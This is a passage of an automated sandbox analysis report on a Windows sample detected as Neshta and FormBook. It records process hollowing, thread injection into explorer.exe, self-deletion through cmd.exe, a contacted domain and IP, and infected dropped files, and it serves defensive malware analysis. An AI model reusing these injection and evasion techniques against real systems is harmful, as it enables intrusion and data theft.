          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4FAB0 mov eax, dword ptr fs:[00000030h]7_2_00A4FAB0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4D294 mov eax, dword ptr fs:[00000030h]7_2_00A4D294
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4D294 mov eax, dword ptr fs:[00000030h]7_2_00A4D294
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A42AE4 mov eax, dword ptr fs:[00000030h]7_2_00A42AE4
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A42ACB mov eax, dword ptr fs:[00000030h]7_2_00A42ACB
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A54A2C mov eax, dword ptr fs:[00000030h]7_2_00A54A2C
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A54A2C mov eax, dword ptr fs:[00000030h]7_2_00A54A2C
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]7_2_00A3A229
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]7_2_00A3A229
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]7_2_00A3A229
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]7_2_00A3A229
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]7_2_00A3A229
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]7_2_00A3A229
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]7_2_00A3A229
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]7_2_00A3A229
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]7_2_00A3A229
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A28A0A mov eax, dword ptr fs:[00000030h]7_2_00A28A0A
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A15210 mov eax, dword ptr fs:[00000030h]7_2_00A15210
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A15210 mov ecx, dword ptr fs:[00000030h]7_2_00A15210
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A15210 mov eax, dword ptr fs:[00000030h]7_2_00A15210
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.agileintelligence.coach
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection loaded: unknown target: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3440Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: E0000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 10A0000Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe' Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe' Jump to behavior
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeProcess created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'Jump to behavior
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.442375787.00000000083E9000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.336952872.00000000008B8000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.372075782.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.372075782.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: GetLocaleInfoA,1_2_0040D74C
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: GetLocaleInfoA,1_2_00403CB4
          Source: C:\Windows\svchost.comCode function: GetLocaleInfoA,5_2_0040D74C
          Source: C:\Windows\svchost.comCode function: GetLocaleInfoA,5_2_00403CB4
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F270 GetLocalTime,1_2_0040F270
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040D815 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,1_2_0040D815
          Source: vi0EwpbUht.exe, 00000001.00000003.441467911.00000000022C4000.00000004.00000001.sdmpBinary or memory string: MSASCui.exe
          Source: vi0EwpbUht.exe, 00000001.00000003.441467911.00000000022C4000.00000004.00000001.sdmpBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPE
          Yara detected NeshtaShow sources
          Source: Yara matchFile source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara matchFile source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Windows Service1Windows Service1Deobfuscate/Decode Files or Information1Credential API Hooking1System Time Discovery1Taint Shared Content1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Registry Run Keys / Startup Folder11Process Injection512Obfuscated Files or Information2Input Capture11System Network Connections Discovery1Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder11Software Packing11Security Account ManagerFile and Directory Discovery4SMB/Windows Admin SharesInput Capture11Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Rootkit1NTDSSystem Information Discovery114Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading321LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion31Cached Domain CredentialsSecurity Software Discovery241VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection512DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemVirtualization/Sandbox Evasion31Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 432848 Sample: vi0EwpbUht Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Antivirus detection for dropped file 2->81 83 9 other signatures 2->83 11 vi0EwpbUht.exe 4 2->11         started        process3 file4 55 C:\Windows\svchost.com, PE32 11->55 dropped 57 C:\Users\user\AppData\Local\...\setup.exe, PE32 11->57 dropped 59 C:\Users\user\AppData\...\vi0EwpbUht.exe, PE32 11->59 dropped 61 10 other malicious files 11->61 dropped 123 Creates an undocumented autostart registry key 11->123 125 Drops PE files with a suspicious file extension 11->125 127 Drops executable to a common third party application directory 11->127 129 Infects executable files (exe, dll, sys, html) 11->129 15 vi0EwpbUht.exe 1 21 11->15         started        signatures5 process6 file7 63 C:\Users\user\AppData\Roaming\...\elxhan.exe, PE32 15->63 dropped 65 C:\Users\user\AppData\Local\...\System.dll, PE32 15->65 dropped 71 Detected unpacking (changes PE section rights) 15->71 73 Maps a DLL or memory area into another process 15->73 75 Tries to detect virtualization through RDTSC time measurements 15->75 19 vi0EwpbUht.exe 15->19         started        signatures8 process9 signatures10 85 Modifies the context of a thread in another process (thread injection) 19->85 87 Maps a DLL or memory area into another process 19->87 89 Sample uses process hollowing technique 19->89 91 Queues an APC in another process (thread injection) 19->91 22 explorer.exe 19->22 injected process11 dnsIp12 67 www.agileintelligence.coach 22->67 69 agileintelligence.coach 34.102.136.180, 49753, 80 GOOGLEUS United States 22->69 99 System process connects to network (likely due to code injection or exploit) 22->99 101 Drops executables to the windows directory (C:\Windows) and starts them 22->101 103 Uses netstat to query active network connections and open ports 22->103 26 svchost.com 2 22->26         started        30 NETSTAT.EXE 22->30         started        32 help.exe 22->32         started        signatures13 process14 file15 47 C:\...\protocolhandler.exe, PE32 26->47 dropped 49 C:\Program Files (x86)\...\misc.exe, PE32 26->49 dropped 51 C:\Program Files (x86)\...\lynchtmlconv.exe, PE32 26->51 dropped 53 98 other malicious files 26->53 dropped 111 Sample is not signed and drops a device driver 26->111 113 Drops executable to a common third party application directory 26->113 115 Infects executable files (exe, dll, sys, html) 26->115 34 elxhan.exe 17 26->34         started        117 Modifies the context of a thread in another process (thread injection) 30->117 119 Maps a DLL or memory area into another process 30->119 121 Tries to detect virtualization through RDTSC time measurements 30->121 38 cmd.exe 1 30->38         started        signatures16 process17 file18 45 C:\Users\user\AppData\Local\...\System.dll, PE32 34->45 dropped 93 Detected unpacking (changes PE section rights) 34->93 95 Maps a DLL or memory area into another process 34->95 97 Tries to detect virtualization through RDTSC time measurements 34->97 40 elxhan.exe 34->40         started        43 conhost.exe 38->43         started        signatures19 process20 signatures21 105 Modifies the context of a thread in another process (thread injection) 40->105 107 Maps a DLL or memory area into another process 40->107 109 Sample uses process hollowing technique 40->109

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          vi0EwpbUht.exe91%MetadefenderBrowse
          vi0EwpbUht.exe100%ReversingLabsWin32.Virus.Neshta
          vi0EwpbUht.exe100%AviraW32/Neshta.A
          vi0EwpbUht.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe100%AviraW32/Neshta.A
          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\Uninstall.exe100%AviraW32/Neshta.A
          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe100%Joe Sandbox ML
          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Uninstall.exe100%Joe Sandbox ML
          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe96%ReversingLabsWin32.Virus.Neshta
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe96%ReversingLabsWin32.Virus.Neshta
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe96%ReversingLabsWin32.Virus.Neshta
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe97%ReversingLabsWin32.Virus.Neshta
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe100%ReversingLabsWin32.Virus.Neshta
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe91%MetadefenderBrowse
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe100%ReversingLabsWin32.Virus.Neshta

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.vi0EwpbUht.exe.400000.0.unpack100%AviraW32/Neshta.ADownload File
          7.1.elxhan.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
